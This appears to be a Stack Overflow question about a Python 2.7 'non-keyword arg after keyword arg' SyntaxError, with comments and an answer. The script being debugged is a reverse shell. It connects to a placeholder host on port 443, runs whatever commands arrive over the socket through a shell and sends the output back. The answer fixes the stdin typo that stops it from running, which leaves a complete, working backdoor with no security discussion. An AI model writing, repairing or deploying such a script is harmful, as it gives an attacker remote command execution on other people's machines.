# SyntaxError: non-keyword argument after keyword argument

Tags: python-2.7

Here is my code, when I run it I get this error: `"SyntaxError: non-keyword arg after keyword arg"`

```
#!/usr/bin/python

import subprocess

import socket

host =  'IP ADDRESS'

port = 443

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host, port))
s.send('Hello there!\n')

while 1:

    data = s.recv(1024)
    if data == 'quit':
        break
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin,subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()
    s.send(stdoutput)
s.send('Bye')

s.close()
```

Comment: Presumably, the line `proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin,subprocess.PIPE)` is highlighted in the traceback, and the error message tells you *exactly what the problem is*. So what is it that you don't get?

Comment: possible duplicate of ["SyntaxError: non-keyword arg after keyword arg" Error in Python when using requests.post()](http://stackoverflow.com/questions/15723294/syntaxerror-non-keyword-arg-after-keyword-arg-error-in-python-when-using-requ)

Comment: @jonsharpe not, that's not the issue here. It's a typo - `stdin,subprocess.PIPE` should be `stdin=subprocess.PIPE`.

Answer (score 0):

You have a comma `,` where an equals `=` should be:

```
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin,subprocess.PIPE)
                                                                                               ^
```

It should be `stdin=subprocess.PIPE` instead.